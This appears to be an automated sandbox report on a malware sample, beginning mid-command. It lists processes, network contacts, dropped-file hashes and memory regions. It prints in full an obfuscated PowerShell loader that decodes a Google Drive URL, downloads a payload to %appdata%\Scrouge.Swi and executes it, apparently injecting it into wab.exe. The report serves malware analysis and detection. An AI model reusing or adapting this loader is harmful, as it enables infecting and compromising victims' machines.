AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. 
Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. 
SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. 
FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil 
Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. 
AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.169.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 171.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 172.217.169.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |

Files

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 3f44b1c79c509dd186323a817d847674
SHA1 b2949cdc34fbe95d0d77f5dea144445d5b7cf78d
SHA256 f2cf46f19948aa002236ed9eac587a4eb3f914a56280a872640b5b30eafa6b0a
SHA512 30e44232012a66b3aea0ce7605f0fa7a628048b707e37d8a76ce42b939be52b46a301049b8b5796e54f7d787ca48c914e8b9a7e13ed2cba3b8fe58ff0d40185b

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 675326a981cefa842930734b5c9ee3bd
SHA1 3591809f3339f0e9a22ec835ff7c46077da90fd3
SHA256 cc8dd61c508a5b6a490011662b4ed0c82335c1c2c50b19b1c6f579c2e971affd
SHA512 fe2590005684b1fc879a5f1fc36ee2e73af79010f7dc86ed1bd8dd18ca65859320bbea441b2303cc91a9813ab6c886334238c931a751edaba724e40e12985d84

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 881493d7ec3ce1c66e2249660ae3d361
SHA1 3698f16689f485c0c7c127227da8a9d780fb08aa
SHA256 002beb6a1061e9bab51fcc3afaa08fb61fd3b06190913b4c75b790999609e6a6
SHA512 e5b93117f80487ae7b63630eb4e3f3cfa02eb03512a5f4798da224e9fc7c6635dc30f07093f10c2868b5df1cd3d23adbf3eb69e1fcbe052de6e7e7e67b861f02

memory/1196-322-0x00007FF899AA3000-0x00007FF899AA5000-memory.dmp

memory/1196-323-0x0000026CD7DB0000-0x0000026CD7DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_va1y1fnr.sqa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1196-333-0x00007FF899AA0000-0x00007FF89A561000-memory.dmp

memory/1196-334-0x00007FF899AA0000-0x00007FF89A561000-memory.dmp

memory/3612-337-0x000000007482E000-0x000000007482F000-memory.dmp

memory/3612-338-0x00000000024A0000-0x00000000024D6000-memory.dmp

memory/3612-339-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3612-340-0x0000000004F50000-0x0000000005578000-memory.dmp

memory/3612-341-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3612-342-0x0000000005630000-0x0000000005652000-memory.dmp

memory/3612-343-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/3612-348-0x00000000057B0000-0x0000000005816000-memory.dmp

memory/3612-354-0x0000000005920000-0x0000000005C74000-memory.dmp

memory/3612-355-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

memory/3612-356-0x0000000005DF0000-0x0000000005E3C000-memory.dmp

memory/3612-357-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/3612-358-0x0000000006370000-0x000000000638A000-memory.dmp

memory/3612-360-0x0000000006FD0000-0x0000000006FF2000-memory.dmp

memory/3612-359-0x0000000007040000-0x00000000070D6000-memory.dmp

memory/3612-361-0x0000000007DF0000-0x0000000008394000-memory.dmp

C:\Users\Admin\AppData\Roaming\Scrouge.Swi

MD5 be60fe46432e08e827aeefd9f72d5790
SHA1 7322ebc77810e84976136174258dddde78a23f27
SHA256 8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4
SHA512 72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913

memory/3612-363-0x00000000083A0000-0x000000000DFF9000-memory.dmp

memory/1196-364-0x00007FF899AA3000-0x00007FF899AA5000-memory.dmp

memory/1196-365-0x00007FF899AA0000-0x00007FF89A561000-memory.dmp

memory/3612-368-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3612-367-0x000000007482E000-0x000000007482F000-memory.dmp

memory/3612-369-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3612-383-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/1156-382-0x0000000001000000-0x0000000002254000-memory.dmp

memory/1156-384-0x0000000001000000-0x0000000001042000-memory.dmp

memory/1196-387-0x00007FF899AA0000-0x00007FF89A561000-memory.dmp

memory/1156-388-0x00000000263E0000-0x0000000026430000-memory.dmp

memory/1156-389-0x0000000026B00000-0x0000000026B92000-memory.dmp

memory/1156-390-0x0000000026430000-0x000000002643A000-memory.dmp